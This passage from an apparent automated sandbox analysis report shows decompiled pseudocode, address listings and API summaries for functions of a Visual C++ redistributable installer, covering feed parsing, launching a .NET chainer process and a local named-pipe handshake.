												_push(_v12);
												_push(_t129);
												goto L8;
											}
										} else {
											_push(_v12);
											_push(_t139);
											L8:
											_t113 = E000567C4(_t137);
											L33:
											_t140 = _t113;
											if(_t140 >= 0) {
												L34:
												if(_v8 != 0) {
													__imp__#6(_v8);
													_v8 = _v8 & 0x00000000;
												}
												_t137 = _v12;
												if(_t137 != 0) {
													 *((intOrPtr*)( *_t137 + 8))(_t137);
													_v12 = _v12 & 0x00000000;
												}
												_t140 = E00053760(_t137, _v16,  &_v12,  &_v8);
												if(_t140 != 0) {
													goto L42;
												} else {
													_t140 = _v20;
													continue;
												}
											}
										}
										goto L55;
									}
								}
							}
						}
					}
				}
				L55:
				__eflags = _v8;
				if(_v8 != 0) {
					__imp__#6(_v8);
				}
				_t133 = _v12;
				__eflags = _t133;
				if(_t133 != 0) {
					 *((intOrPtr*)( *_t133 + 8))(_t133);
				}
				_t134 = _v16;
				__eflags = _t134;
				if(_t134 != 0) {
					 *((intOrPtr*)( *_t134 + 8))(_t134);
				}
				return _t140;
			}



























                                                                          0x00056fbe
                                                                          0x00056fc5
                                                                          0x00056fc8
                                                                          0x00056fcb
                                                                          0x00056fce
                                                                          0x00056fd1
                                                                          0x00056fd7
                                                                          0x00056fed
                                                                          0x00056ff1
                                                                          0x0005700a
                                                                          0x0005700e
                                                                          0x00057027
                                                                          0x0005702b
                                                                          0x00057033
                                                                          0x0005703b
                                                                          0x0005703f
                                                                          0x00057055
                                                                          0x00057059
                                                                          0x00057266
                                                                          0x00057266
                                                                          0x00057268
                                                                          0x0005726a
                                                                          0x0005726c
                                                                          0x000572a9
                                                                          0x000572a9
                                                                          0x000572ae
                                                                          0x000572af
                                                                          0x00000000
                                                                          0x0005726e
                                                                          0x00057270
                                                                          0x00057273
                                                                          0x00000000
                                                                          0x00057275
                                                                          0x00057275
                                                                          0x00057278
                                                                          0x0005727a
                                                                          0x0005729c
                                                                          0x0005729c
                                                                          0x000572a1
                                                                          0x000572a2
                                                                          0x00000000
                                                                          0x0005727c
                                                                          0x0005727c
                                                                          0x0005727f
                                                                          0x00000000
                                                                          0x00057281
                                                                          0x00057281
                                                                          0x00057284
                                                                          0x00057298
                                                                          0x00057298
                                                                          0x00057286
                                                                          0x00057286
                                                                          0x00057289
                                                                          0x00000000
                                                                          0x0005728b
                                                                          0x0005728b
                                                                          0x00057290
                                                                          0x00057291
                                                                          0x000572b4
                                                                          0x000572b4
                                                                          0x00000000
                                                                          0x000572b4
                                                                          0x00057289
                                                                          0x00057284
                                                                          0x0005727f
                                                                          0x0005727a
                                                                          0x00057273
                                                                          0x0005726c
                                                                          0x0005705f
                                                                          0x0005705f
                                                                          0x00057062
                                                                          0x00057065
                                                                          0x0005706b
                                                                          0x00000000
                                                                          0x0005706e
                                                                          0x00057083
                                                                          0x000570a3
                                                                          0x000570a5
                                                                          0x000570a8
                                                                          0x000570c3
                                                                          0x000570c5
                                                                          0x000570c8
                                                                          0x000570df
                                                                          0x000570e1
                                                                          0x000570e4
                                                                          0x00057107
                                                                          0x00057109
                                                                          0x0005710c
                                                                          0x00057123
                                                                          0x00057125
                                                                          0x00057128
                                                                          0x0005715c
                                                                          0x0005715e
                                                                          0x00057161
                                                                          0x00057195
                                                                          0x00057197
                                                                          0x0005719a
                                                                          0x000571d7
                                                                          0x000571da
                                                                          0x00057201
                                                                          0x00000000
                                                                          0x000571dc
                                                                          0x000571ea
                                                                          0x000571ec
                                                                          0x000571ee
                                                                          0x000571f4
                                                                          0x00000000
                                                                          0x000571f4
                                                                          0x000571ee
                                                                          0x0005719c
                                                                          0x0005719c
                                                                          0x000571a0
                                                                          0x0005725f
                                                                          0x000571a6
                                                                          0x000571aa
                                                                          0x000571af
                                                                          0x000571b2
                                                                          0x000571b4
                                                                          0x00057252
                                                                          0x00057257
                                                                          0x00057258
                                                                          0x000572b6
                                                                          0x000572b6
                                                                          0x000572bb
                                                                          0x000571ba
                                                                          0x000571be
                                                                          0x00000000
                                                                          0x000571be
                                                                          0x000571b4
                                                                          0x000571a0
                                                                          0x00057163
                                                                          0x00057172
                                                                          0x00057174
                                                                          0x00057176
                                                                          0x0005717c
                                                                          0x00000000
                                                                          0x0005717c
                                                                          0x00057176
                                                                          0x0005712a
                                                                          0x00057139
                                                                          0x0005713b
                                                                          0x0005713d
                                                                          0x00057143
                                                                          0x00000000
                                                                          0x00057143
                                                                          0x0005713d
                                                                          0x0005710e
                                                                          0x0005710e
                                                                          0x00000000
                                                                          0x0005710e
                                                                          0x000570e6
                                                                          0x000570e6
                                                                          0x000570e9
                                                                          0x000570ed
                                                                          0x00000000
                                                                          0x000570ed
                                                                          0x000570ca
                                                                          0x000570ca
                                                                          0x00000000
                                                                          0x000570ca
                                                                          0x000570aa
                                                                          0x000570aa
                                                                          0x000570ad
                                                                          0x000570ad
                                                                          0x000570b0
                                                                          0x00000000
                                                                          0x000570b0
                                                                          0x00057085
                                                                          0x00057085
                                                                          0x00057088
                                                                          0x00057089
                                                                          0x00057089
                                                                          0x00057206
                                                                          0x00057206
                                                                          0x0005720a
                                                                          0x00057210
                                                                          0x00057214
                                                                          0x00057219
                                                                          0x0005721f
                                                                          0x0005721f
                                                                          0x00057223
                                                                          0x00057228
                                                                          0x0005722d
                                                                          0x00057230
                                                                          0x00057230
                                                                          0x00057244
                                                                          0x00057248
                                                                          0x00000000
                                                                          0x0005724a
                                                                          0x0005724a
                                                                          0x00000000
                                                                          0x0005724a
                                                                          0x00057248
                                                                          0x0005720a
                                                                          0x00000000
                                                                          0x00057083
                                                                          0x0005706e
                                                                          0x00057059
                                                                          0x0005703f
                                                                          0x0005702b
                                                                          0x0005700e
                                                                          0x000572c0
                                                                          0x000572c0
                                                                          0x000572c4
                                                                          0x000572c9
                                                                          0x000572c9
                                                                          0x000572cf
                                                                          0x000572d2
                                                                          0x000572d4
                                                                          0x000572d9
                                                                          0x000572d9
                                                                          0x000572dc
                                                                          0x000572df
                                                                          0x000572e1
                                                                          0x000572e6
                                                                          0x000572e6
                                                                          0x000572f1

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00073C78,000000FF,?,?,?), ref: 0005707E
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 000570A3
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 000570C3
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 000570DF
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 00057107
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00057123
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 0005715C
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 00057195
                                                                            • Part of subcall function 00056BF6: SysFreeString.OLEAUT32(00000000), ref: 00056D2F
                                                                            • Part of subcall function 00056BF6: SysFreeString.OLEAUT32(00000000), ref: 00056D71
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00057219
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000572C9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$Compare$Free
                                                                          • String ID: ($atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                          • API String ID: 318886736-4294603148
                                                                          • Opcode ID: b46d8ac141756e1c132d1ad9202089e31ce785b8303362df4e597c98c0c4b9dd
                                                                          • Instruction ID: f61829705810cb4bd7dc614f5f03dae4d208cd56ff3ef3b2cff276c61ca4a4b1
                                                                          • Opcode Fuzzy Hash: b46d8ac141756e1c132d1ad9202089e31ce785b8303362df4e597c98c0c4b9dd
                                                                          • Instruction Fuzzy Hash: E5A1B131908616BBDB219B94DC41FAFB7B8AB04721F204354FE29AB1D1D731EE44EB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003D22C Relevance: 45.8, APIs: 10, Strings: 16, Instructions: 276processCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 56%
                                                                          			E0003D22C(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, DWORD* _a20) {
				signed int _v8;
				char _v88;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				struct _SECURITY_ATTRIBUTES* _v120;
				signed short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				struct _PROCESS_INFORMATION _v148;
				intOrPtr _v152;
				WCHAR* _v156;
				DWORD* _v160;
				intOrPtr _v164;
				void* _v168;
				signed int _v172;
				signed short _v176;
				signed int _v180;
				char _v184;
				struct _STARTUPINFOW _v252;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				signed int _t84;
				signed short _t86;
				signed short _t89;
				signed short _t100;
				signed short _t104;
				signed short _t105;
				long _t119;
				signed short _t123;
				signed short _t124;
				signed short _t127;
				void* _t134;
				DWORD* _t139;
				signed short _t140;
				void* _t143;
				void* _t147;
				signed short _t156;
				signed short _t159;
				signed short _t162;
				signed int _t163;

				_t143 = __edx;
				_t73 =  *0x7a008; // 0xfbf51acb
				_v8 = _t73 ^ _t163;
				_v156 = _a4;
				_v152 = _a8;
				_v132 = _a12;
				_v128 = _a16;
				_v160 = _a20;
				asm("stosd");
				_t133 = 0;
				_v116 = 0;
				asm("stosd");
				_v112 = 0;
				_v120 = 0;
				_v108 = 0;
				asm("stosd");
				asm("stosd");
				E0003F670( &_v104,  &_v252, 0, 0x44);
				_v124 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t84 =  &_v104;
				__imp__UuidCreate(_t84);
				if((_t84 | 0x00000001) >= 0) {
					_t86 =  &_v104;
					__imp__StringFromGUID2(_t86,  &_v88, 0x27);
					__eflags = _t86;
					if(_t86 != 0) {
						_t89 = E00011F20( &_v112, L"NetFxSection.%ls",  &_v88);
						__eflags = _t89;
						if(_t89 >= 0) {
							__eflags = E00011F20( &_v116, L"NetFxEvent.%ls",  &_v88);
							if(__eflags >= 0) {
								_t153 = E0003CC24(0, _t134, __eflags, _v112, _v116,  &_v108);
								__eflags = _t153;
								if(_t153 >= 0) {
									_push(_v112);
									_t153 = E00011F62( &_v120, L"%ls /pipe %ls", _v152);
									__eflags = _t153;
									if(_t153 >= 0) {
										_t146 = _v156;
										_v252.cb = 0x44;
										_t100 = CreateProcessW(_v156, _v120, 0, 0, 0, 0x8000000, 0, 0,  &_v252,  &_v148);
										__eflags = _t100;
										if(_t100 != 0) {
											_t133 = _v108;
											_t146 = WaitForMultipleObjects;
											_v168 = _v148.hProcess;
											_v164 =  *((intOrPtr*)(_v108 + 4));
											while(1) {
												_t104 = WaitForMultipleObjects(2,  &_v168, 0, 0x64);
												__eflags = _t104;
												if(_t104 == 0) {
													break;
												}
												__eflags = _t104 - 1;
												if(_t104 != 1) {
													__eflags = _t104 - 0xffffffff;
													if(_t104 == 0xffffffff) {
														_t105 = GetLastError();
														__eflags = _t105;
														_t156 =  <=  ? _t105 : _t105 & 0x0000ffff | 0x80070000;
														__eflags = _t156;
														_t153 =  >=  ? 0x80004005 : _t156;
														E000137D3(0x80004005, "NetFxChainer.cpp", 0x19e, _t153);
														_push("Failed to wait for netfx chainer process to complete");
														L2:
														_push(_t153);
														E0005012F();
														L29:
														if(_v112 != 0) {
															E000554EF(_v112);
														}
														if(_v116 != 0) {
															E000554EF(_v116);
														}
														E00012793(_v120);
														E0003CEF5(_t133, _t146, _t133);
														_t147 = CloseHandle;
														if(_v148.hThread != 0) {
															CloseHandle(_v148.hThread);
															_v148.hThread = _v148.hThread & 0x00000000;
														}
														if(_v148.hProcess != 0) {
															CloseHandle(_v148.hProcess);
														}
														return E0003DE36(_t133, _v8 ^ _t163, _t143, _t147, _t153);
													}
													continue;
												}
												_t153 = E0003D12C(_t133, _v132, _v128);
												__eflags = _t153;
												if(_t153 >= 0) {
													continue;
												}
												_push("Failed to process netfx chainer message.");
												goto L2;
											}
											_t119 = E0003CFFC(_t133,  &_v124);
											_t139 = _v160;
											 *_t139 = _t119;
											__eflags = _t119 - 0x8000000a;
											if(_t119 != 0x8000000a) {
												_t140 = _v124;
												__eflags = _t140;
												if(_t140 < 0) {
													_t146 =  &_v184;
													asm("stosd");
													asm("stosd");
													asm("stosd");
													asm("stosd");
													_v180 = _v180 & 0x00000000;
													_t56 =  &_v172;
													 *_t56 = _v172 & 0x00000000;
													__eflags =  *_t56;
													_v184 = 1;
													_v176 = _t140;
													_v132( &_v184, _v128);
												}
												goto L29;
											}
											_t123 = GetExitCodeProcess(_v148, _t139);
											__eflags = _t123;
											if(_t123 != 0) {
												goto L29;
											}
											_t124 = GetLastError();
											__eflags = _t124;
											_t159 =  <=  ? _t124 : _t124 & 0x0000ffff | 0x80070000;
											__eflags = _t159;
											_t153 =  >=  ? 0x80004005 : _t159;
											E000137D3(0x80004005, "NetFxChainer.cpp", 0x18a, _t153);
											_push("Failed to get netfx return code.");
											goto L2;
										}
										_t127 = GetLastError();
										__eflags = _t127;
										_t162 =  <=  ? _t127 : _t127 & 0x0000ffff | 0x80070000;
										__eflags = _t162;
										_t153 =  >=  ? 0x80004005 : _t162;
										E000137D3(0x80004005, "NetFxChainer.cpp", 0x17a,  >=  ? 0x80004005 : _t162);
										E0005012F( >=  ? 0x80004005 : _t162, "Failed to CreateProcess on path: %ls", _t146);
										L12:
										_t133 = _v108;
										goto L29;
									}
									_push("Failed to allocate netfx chainer arguments.");
									L11:
									_push(_t153);
									E0005012F();
									goto L12;
								}
								_push("Failed to create netfx chainer.");
								goto L11;
							}
							_push("Failed to allocate event name.");
							goto L2;
						}
						_push("Failed to allocate section name.");
						goto L2;
					}
					_t153 = 0x8007000e;
					E000137D3(_t86, "NetFxChainer.cpp", 0x168, 0x8007000e);
					_push("Failed to convert netfx chainer guid into string.");
					goto L2;
				}
				_push("Failed to create netfx chainer guid.");
				goto L2;
			}
















































                                                                          0x0003d22c
                                                                          0x0003d235
                                                                          0x0003d23c
                                                                          0x0003d242
                                                                          0x0003d24b
                                                                          0x0003d254
                                                                          0x0003d25b
                                                                          0x0003d263
                                                                          0x0003d270
                                                                          0x0003d271
                                                                          0x0003d276
                                                                          0x0003d279
                                                                          0x0003d27a
                                                                          0x0003d27d
                                                                          0x0003d280
                                                                          0x0003d283
                                                                          0x0003d284
                                                                          0x0003d28c
                                                                          0x0003d293
                                                                          0x0003d29f
                                                                          0x0003d2a0
                                                                          0x0003d2a1
                                                                          0x0003d2a2
                                                                          0x0003d2a3
                                                                          0x0003d2a7
                                                                          0x0003d2b2
                                                                          0x0003d2cc
                                                                          0x0003d2d0
                                                                          0x0003d2d6
                                                                          0x0003d2d8
                                                                          0x0003d303
                                                                          0x0003d30d
                                                                          0x0003d30f
                                                                          0x0003d32f
                                                                          0x0003d331
                                                                          0x0003d34c
                                                                          0x0003d34e
                                                                          0x0003d350
                                                                          0x0003d367
                                                                          0x0003d37e
                                                                          0x0003d383
                                                                          0x0003d385
                                                                          0x0003d38e
                                                                          0x0003d3a1
                                                                          0x0003d3bc
                                                                          0x0003d3c2
                                                                          0x0003d3c4
                                                                          0x0003d408
                                                                          0x0003d411
                                                                          0x0003d417
                                                                          0x0003d420
                                                                          0x0003d44e
                                                                          0x0003d45b
                                                                          0x0003d45d
                                                                          0x0003d45f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003d428
                                                                          0x0003d42b
                                                                          0x0003d449
                                                                          0x0003d44c
                                                                          0x0003d4cb
                                                                          0x0003d4da
                                                                          0x0003d4dc
                                                                          0x0003d4e4
                                                                          0x0003d4e6
                                                                          0x0003d4f4
                                                                          0x0003d4f9
                                                                          0x0003d2b9
                                                                          0x0003d2b9
                                                                          0x0003d2ba
                                                                          0x0003d541
                                                                          0x0003d545
                                                                          0x0003d54a
                                                                          0x0003d54a
                                                                          0x0003d553
                                                                          0x0003d558
                                                                          0x0003d558
                                                                          0x0003d560
                                                                          0x0003d566
                                                                          0x0003d572
                                                                          0x0003d578
                                                                          0x0003d580
                                                                          0x0003d582
                                                                          0x0003d582
                                                                          0x0003d590
                                                                          0x0003d598
                                                                          0x0003d598
                                                                          0x0003d5ac
                                                                          0x0003d5ac
                                                                          0x00000000
                                                                          0x0003d44c
                                                                          0x0003d439
                                                                          0x0003d43b
                                                                          0x0003d43d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003d43f
                                                                          0x00000000
                                                                          0x0003d43f
                                                                          0x0003d466
                                                                          0x0003d46b
                                                                          0x0003d471
                                                                          0x0003d473
                                                                          0x0003d478
                                                                          0x0003d503
                                                                          0x0003d506
                                                                          0x0003d508
                                                                          0x0003d50f
                                                                          0x0003d515
                                                                          0x0003d516
                                                                          0x0003d517
                                                                          0x0003d518
                                                                          0x0003d51f
                                                                          0x0003d526
                                                                          0x0003d526
                                                                          0x0003d526
                                                                          0x0003d52e
                                                                          0x0003d538
                                                                          0x0003d53e
                                                                          0x0003d53e
                                                                          0x00000000
                                                                          0x0003d508
                                                                          0x0003d485
                                                                          0x0003d48b
                                                                          0x0003d48d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003d493
                                                                          0x0003d4a2
                                                                          0x0003d4a4
                                                                          0x0003d4ac
                                                                          0x0003d4ae
                                                                          0x0003d4bc
                                                                          0x0003d4c1
                                                                          0x00000000
                                                                          0x0003d4c1
                                                                          0x0003d3c6
                                                                          0x0003d3d5
                                                                          0x0003d3d7
                                                                          0x0003d3df
                                                                          0x0003d3e1
                                                                          0x0003d3ef
                                                                          0x0003d3fb
                                                                          0x0003d35f
                                                                          0x0003d35f
                                                                          0x00000000
                                                                          0x0003d35f
                                                                          0x0003d387
                                                                          0x0003d357
                                                                          0x0003d357
                                                                          0x0003d358
                                                                          0x00000000
                                                                          0x0003d35e
                                                                          0x0003d352
                                                                          0x00000000
                                                                          0x0003d352
                                                                          0x0003d333
                                                                          0x00000000
                                                                          0x0003d333
                                                                          0x0003d311
                                                                          0x00000000
                                                                          0x0003d311
                                                                          0x0003d2da
                                                                          0x0003d2ea
                                                                          0x0003d2ef
                                                                          0x00000000
                                                                          0x0003d2ef
                                                                          0x0003d2b4
                                                                          0x00000000

                                                                          APIs
                                                                          • UuidCreate.RPCRT4(?), ref: 0003D2A7
                                                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 0003D2D0
                                                                          • CreateProcessW.KERNEL32 ref: 0003D3BC
                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0003D3C6
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 0003D45B
                                                                          • GetExitCodeProcess.KERNEL32 ref: 0003D485
                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0003D493
                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0003D4CB
                                                                            • Part of subcall function 0003D12C: WaitForSingleObject.KERNEL32(?,000000FF,746AF730,00000000,?,?,?,?,0003D439,?), ref: 0003D145
                                                                            • Part of subcall function 0003D12C: ReleaseMutex.KERNEL32(?,?,?,?,0003D439,?), ref: 0003D161
                                                                            • Part of subcall function 0003D12C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0003D1A4
                                                                            • Part of subcall function 0003D12C: ReleaseMutex.KERNEL32(?), ref: 0003D1BB
                                                                            • Part of subcall function 0003D12C: SetEvent.KERNEL32(?), ref: 0003D1C4
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0003D580
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0003D598
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastWait$CloseCreateHandleMutexObjectProcessReleaseSingle$CodeEventExitFromMultipleObjectsStringUuid
                                                                          • String ID: %ls /pipe %ls$@Met$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                                          • API String ID: 2531618940-167293991
                                                                          • Opcode ID: 1e86c5fc7a7ce11f500bc6bc55fa964c2ac41724fb8a5cba7e851949be666f14
                                                                          • Instruction ID: 19a2ad27e8b5575ed2d81c7c7cca263b4d65fb81aa491246ec4084570cedcb50
                                                                          • Opcode Fuzzy Hash: 1e86c5fc7a7ce11f500bc6bc55fa964c2ac41724fb8a5cba7e851949be666f14
                                                                          • Instruction Fuzzy Hash: 0BA1A071E00728ABEB219BA5DC45BEEB7BCAF04300F10416AFA09FB152D7759E448F91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000252E3 Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 222filepipesleepCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 80%
                                                                          			E000252E3(long _a4) {
				long _v8;
				signed int _v12;
				void _v16;
				signed int _v20;
				void* _v24;
				void _v28;
				void _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				WCHAR* _t40;
				long _t43;
				signed int _t44;
				signed short _t48;
				signed short _t56;
				signed short _t62;
				signed short _t67;
				signed short _t73;
				signed short _t79;
				void* _t83;
				long _t84;
				signed int _t88;
				void* _t109;

				_t84 = _a4;
				_t88 = 0;
				_v40 =  *((intOrPtr*)(_t84 + 0x10));
				_v36 =  *((intOrPtr*)(_t84 + 0x14));
				_t40 =  *(_t84 + 4);
				_v24 = _t40;
				_v16 = lstrlenW(_t40) + _t41;
				_t43 = GetCurrentProcessId();
				_v32 = _v32 & 0;
				_a4 = _a4 & 0;
				_v28 = _t43;
				_t44 = 0;
				_v20 = 0;
				while(1) {
					L1:
					_t83 =  *(_t109 + _t44 * 4 - 0x24);
					if(_t83 == 0xffffffff) {
						break;
					}
					_v8 = 1;
					if(SetNamedPipeHandleState(_t83,  &_v8, 0, 0) == 0) {
						_t48 = GetLastError();
						_t91 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						_t88 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "pipe.cpp", 0x1ce, _t88);
						_push("Failed to set pipe to non-blocking.");
						goto L28;
					} else {
						_v12 = _v12 & 0x00000000;
						do {
							if(ConnectNamedPipe(_t83, 0) != 0) {
								goto L9;
							} else {
								_t52 = GetLastError();
								if(_t52 == 0x217) {
									_t88 = 0;
									L11:
									_v8 = _v8 & 0x00000000;
									if(SetNamedPipeHandleState(_t83,  &_v8, 0, 0) == 0) {
										_t56 = GetLastError();
										_t94 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
										_t88 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
										E000137D3(0x80004005, "pipe.cpp", 0x1f9, _t88);
										_push("Failed to reset pipe to blocking.");
										goto L28;
									} else {
										if(WriteFile(_t83,  &_v16, 4,  &_a4, 0) == 0) {
											_t62 = GetLastError();
											_t97 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
											_t88 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
											E000137D3(0x80004005, "pipe.cpp", 0x1ff, _t88);
											_push("Failed to write secret length to pipe.");
											goto L28;
										} else {
											if(WriteFile(_t83, _v24, _v16,  &_a4, 0) == 0) {
												_t67 = GetLastError();
												_t100 =  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
												_t88 =  >=  ? 0x80004005 :  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
												E000137D3(0x80004005, "pipe.cpp", 0x204, _t88);
												_push("Failed to write secret to pipe.");
												goto L28;
											} else {
												if(WriteFile(_t83,  &_v28, 4,  &_a4, 0) == 0) {
													_t73 = GetLastError();
													_t103 =  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
													_t88 =  >=  ? 0x80004005 :  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
													E000137D3(0x80004005, "pipe.cpp", 0x209, _t88);
													_push("Failed to write our process id to pipe.");
													goto L28;
												} else {
													if(ReadFile(_t83,  &_v32, 4,  &_a4, 0) == 0) {
														_t79 = GetLastError();
														_t106 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
														_t88 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
														E000137D3(0x80004005, "pipe.cpp", 0x20f, _t88);
														_push("Failed to read ACK from pipe.");
														goto L28;
													} else {
														_t44 = _v20 + 1;
														_v20 = _t44;
														if(_t44 < 2) {
															goto L1;
														} else {
														}
													}
												}
											}
										}
									}
								} else {
									if(_t52 != 0x218) {
										_t88 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
										break;
									} else {
										_t52 = _v12;
										if(_t52 >= 0x708) {
											_t88 = 0x800705b4;
											L21:
											E000137D3(_t52, "pipe.cpp", 0x1f3, _t88);
											_push("Failed to wait for child to connect to pipe.");
											L28:
											_push(_t88);
											E0005012F();
										} else {
											_t52 = _t52 + 1;
											_t88 = 0x80070218;
											_v12 = _t52;
											Sleep(0x64);
											goto L9;
										}
									}
								}
							}
							goto L29;
							L9:
						} while (_t88 == 0x80070218);
						if(_t88 < 0) {
							goto L21;
						} else {
							goto L11;
						}
					}
					break;
				}
				L29:
				return _t88;
			}

























                                                                          0x000252e9
                                                                          0x000252f2
                                                                          0x000252f4
                                                                          0x000252fa
                                                                          0x000252fd
                                                                          0x00025301
                                                                          0x0002530c
                                                                          0x0002530f
                                                                          0x00025315
                                                                          0x00025318
                                                                          0x00025321
                                                                          0x00025324
                                                                          0x00025326
                                                                          0x00025329
                                                                          0x00025329
                                                                          0x00025329
                                                                          0x00025330
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002533d
                                                                          0x0002534e
                                                                          0x0002557b
                                                                          0x00025588
                                                                          0x00025592
                                                                          0x000255a0
                                                                          0x000255a5
                                                                          0x00000000
                                                                          0x00025354
                                                                          0x00025354
                                                                          0x00025358
                                                                          0x00025363
                                                                          0x00000000
                                                                          0x00025365
                                                                          0x00025365
                                                                          0x0002536c
                                                                          0x00025457
                                                                          0x000253ac
                                                                          0x000253ac
                                                                          0x000253c1
                                                                          0x0002554a
                                                                          0x00025557
                                                                          0x00025561
                                                                          0x0002556f
                                                                          0x00025574
                                                                          0x00000000
                                                                          0x000253c7
                                                                          0x000253dc
                                                                          0x00025519
                                                                          0x00025526
                                                                          0x00025530
                                                                          0x0002553e
                                                                          0x00025543
                                                                          0x00000000
                                                                          0x000253e2
                                                                          0x000253f7
                                                                          0x000254e5
                                                                          0x000254f2
                                                                          0x000254fc
                                                                          0x0002550a
                                                                          0x0002550f
                                                                          0x00000000
                                                                          0x000253fd
                                                                          0x00025412
                                                                          0x000254b1
                                                                          0x000254be
                                                                          0x000254c8
                                                                          0x000254d6
                                                                          0x000254db
                                                                          0x00000000
                                                                          0x00025418
                                                                          0x0002542d
                                                                          0x0002547d
                                                                          0x0002548a
                                                                          0x00025494
                                                                          0x000254a2
                                                                          0x000254a7
                                                                          0x00000000
                                                                          0x0002542f
                                                                          0x00025432
                                                                          0x00025433
                                                                          0x00025439
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002543f
                                                                          0x00025439
                                                                          0x0002542d
                                                                          0x00025412
                                                                          0x000253f7
                                                                          0x000253dc
                                                                          0x00025372
                                                                          0x00025377
                                                                          0x0002544f
                                                                          0x00000000
                                                                          0x0002537d
                                                                          0x0002537d
                                                                          0x00025385
                                                                          0x0002545e
                                                                          0x00025463
                                                                          0x0002546e
                                                                          0x00025473
                                                                          0x000255aa
                                                                          0x000255aa
                                                                          0x000255ab
                                                                          0x0002538b
                                                                          0x0002538b
                                                                          0x0002538c
                                                                          0x00025393
                                                                          0x00025396
                                                                          0x00000000
                                                                          0x00025396
                                                                          0x00025385
                                                                          0x00025377
                                                                          0x0002536c
                                                                          0x00000000
                                                                          0x0002539c
                                                                          0x0002539c
                                                                          0x000253a6
